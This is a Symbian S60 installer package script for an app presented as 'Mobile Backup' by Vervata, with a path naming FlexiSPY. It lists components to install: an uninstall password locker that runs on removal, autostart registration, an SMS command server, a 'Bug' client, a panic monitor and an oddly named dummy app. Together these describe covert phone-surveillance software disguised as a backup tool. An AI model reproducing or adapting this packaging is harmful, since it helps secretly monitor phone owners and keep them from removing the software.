;
;Backup+.pkg - Installation Package File
;Copyright(c) Vervata Co Ltd.

;Language - standard language definitions
&EN

;Title, UID and application version information.
#{"Mobile Backup"},(0x2000A982),2,1,0

"..\codebase\resource\pro_3rd\ProxFTA.txt"-"",FT,TA

;Localised Vendor name
%{"Vervata Co Ltd"}

;Unique Vendor name
:"Vervata Co Ltd"

;Supports Series 60 v 3.0
[0x101F7961], 0, 0, 0, {"Series60ProductID"}
;[0x101F7961], 0, 0, 0, {"S60ProductID"}

; Essential Application Files
;This is Uninstall Password Protect App

;remvoe app created file
""-"c:\system\apps\2000A982\vpnmnlog.dat", FN

;run on uninstallation
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\gcce\urel\ProxLock.exe"                 			-"c:\sys\bin\proxlock.exe",FR,RR,RW
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\data\z\private\10003a3f\import\apps\ProxLock_reg.rsc"       -"c:\private\10003a3f\import\apps\proxlock_reg.rsc"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\data\z\resource\apps\ProxLock.r01"              			-"c:\resource\apps\proxlock.rsc"

"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\gcce\urel\rbackpro_0x2000A982.exe"	      			-"c:\sys\bin\rbackpro_0x2000A982.exe"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\Data\z\resource\apps\rbackpro_0x2000A982.r01"          	 	-"c:\resource\apps\rbackpro_0x2000A982.rsc"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\Data\z\private\10003a3f\import\apps\rbackpro_0x2000A982_reg.rsc"  			-"c:\private\10003a3f\import\apps\rbackpro_0x2000A982_reg.rsc"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\Data\z\resource\apps\ProdActiv.r01"  	 				-"c:\resource\apps\ProdActiv_0x2000A97B.rsc"
"..\codebase\gfx\aif_reseller\rbackpro_0x2000A982_aif.mif"  		 	-"c:\resource\apps\rbackpro_0x2000A982_aif.mif"

"..\codebase\data\AppWizard_11_comp.DB"				-"c:\private\2000A982\apn.db"
"..\codebase\gfx\menulist_res.mif"-"c:\private\2000A982\menulist_res.mif"
;"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\Data\z\resource\apps\menulist_res.mif"  	 				-"c:\private\2000A982\menulist_res.mif"
"..\codebase\resource\config\antfx.txt"  	 				-"c:\private\2000A982\antfx.txt"

;"C:\Symbian\Projects\private.dat"					  		 		-"c:\private\2000A982\private.dat"
;"C:\Symbian\Projects\errrd"  	 		 							-"c:\resource\errrd"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\Data\z\private\101f875a\import\autostart_0x2000A982.rsc"  			-"c:\private\101f875a\import\[2000A982].rsc"

"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\GCCE\UREL\panmoncli_0x2000A97D.dll" 		 		-"c:\sys\bin\panmoncli_0x2000A97D.dll"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\gcce\urel\vpanmon_0x2000A97C.exe"  			 	-"c:\sys\bin\vpanmon_0x2000A97C.exe"

"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\GCCE\UREL\commonsrv_0x2000A981.DLL" 	 			-"c:\sys\bin\commonsrv_0x2000A981.dll"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\gcce\urel\commonsrv_0x2000A980.exe" 	 			-"c:\sys\bin\commonsrv_0x2000A980.exe"

"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\GCCE\UREL\vsmscserv_0x2000A97E.exe" 	 			-"c:\sys\bin\vsmscserv_0x2000A97E.exe"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\GCCE\UREL\SMSCMDCLI_0x2000A97F.DLL" 	 			-"c:\sys\bin\smscmdcli_0x2000A97F.dll"

;Bug client dll
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\GCCE\UREL\fsbgcli_0x2000A984.dll" 	 			-"c:\sys\bin\fsbgcli_0x2000A984.dll"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\GCCE\UREL\bg_0x2000A983.exe" 	 			-"c:\sys\bin\bg_0x2000A983.exe"

"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\data\z\private\10003a3f\import\apps\x1664578_reg.rsc"  -"c:\private\10003a3f\import\apps\x1664578_reg.rsc"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\data\z\resource\apps\x1664578.rsc"-"c:\resource\apps\x1664578.rsc"
"C:\Symbian\9.2\S60_3rd_FP1\Epoc32\release\gcce\urel\x1664578.exe"-"c:\sys\bin\x1664578.exe"
"C:\Symbian\Projects\FlexiSPY\DummyApp.Mgr\gfx\x1664578_aif.mif"  -"c:\resource\apps\x1664578_aif.mif"
